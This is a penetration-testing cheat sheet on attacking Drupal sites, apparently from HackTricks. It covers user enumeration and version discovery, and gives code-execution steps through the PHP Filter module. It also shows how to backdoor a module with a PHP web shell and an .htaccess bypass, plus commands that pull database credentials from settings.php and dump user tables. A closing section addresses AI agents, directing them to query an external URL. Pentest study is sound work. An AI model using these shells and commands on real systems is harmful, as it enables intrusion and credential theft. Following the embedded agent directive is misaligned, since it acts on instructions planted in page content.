# Drupal

<details>

<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Discovery

* Check **meta**

```bash
curl https://www.drupal.org/ | grep 'content="Drupal'
```

* **Node**: Drupal **indexes its content using nodes**. A node can **hold anything** such as a blog post, poll, article, etc. The page URIs are usually of the form `/node/<nodeid>`.

```bash
curl drupal-site.com/node/1
```

## Enumeration

Drupal supports **three types of users** by default:

1. **`Administrator`**: This user has complete control over the Drupal website.
2. **`Authenticated User`**: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
3. **`Anonymous`**: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

### Version

* Check `/CHANGELOG.txt`

```bash
curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""

Drupal 7.57, 2018-02-21
```

{% hint style="info" %}
Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `README.txt` files.
{% endhint %}

### Username enumeration

#### Register

In */user/register* just try to create a username and if the name is already taken it will be notified:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(254\).png)

#### Request new password

If you request a new password for an existing username:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(255\).png)

If you request a new password for a non-existent username:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(256\).png)

### Get number of users

Accessing */user/\<number>* you can see the number of existing users, in this case is 2 as */users/3* returns a not found error:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(257\).png)

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(227\)%20\(1\)%20\(1\).png)

### Hidden pages

**Fuzz `/node/$` where `$` is a number** (from 1 to 500 for example).\
You could find **hidden pages** (test, dev) which are not referenced by the search engines.

#### Installed modules info

```bash
#From https://twitter.com/intigriti/status/1439192489093644292/photo/1
#Get info on installed modules
curl https://example.com/config/sync/core.extension.yml
curl https://example.com/core/core.services.yml

# Download content from files exposed in the previous step
curl https://example.com/config/sync/swiftmailer.transport.yml
```

### Automatic

```bash
droopescan scan drupal -u http://drupal-site.local
```

## RCE

### With PHP Filter Module

{% hint style="warning" %}
In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated."
{% endhint %}

You need the **plugin php to be installed** (check it accessing to */modules/php* and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**)

Go to *Modules* -> (**Check**) *PHP Filter* -> *Save configuration*

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(247\)%20\(1\).png)

Then click on *Add content* -> Select *Basic Page* or *Article -*> Write *php shellcode on the body* -> Select *PHP code* in *Text format* -> Select *Preview*

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(253\).png)

Finally just access the newly created node:

```bash
curl http://drupal-site.local/node/3
```

### Install PHP Filter Module

From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**.

1. Download the most recent version of the module from the Drupal website.
   1. wget <https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz>
2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**.
3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**.
4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**.

### Backdoored Module

A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).

* Download the archive and extract its contents.

```
wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
```

* Create a **PHP web shell** with the contents:

```php
<?php
system($_GET["cmd"]);
?>
```

* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder.

```html
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
```

* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.

```bash
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
```

* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**.
* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands.

## Post Exploitation

### Read settings.php

```
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
```

### Dump users from DB

```
mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'
```

## References

* <https://academy.hackthebox.com/module/113/section/1209>

<details>

<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://breached.gitbook.io/dashboard/network-services-pentesting/pentesting-web/drupal.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.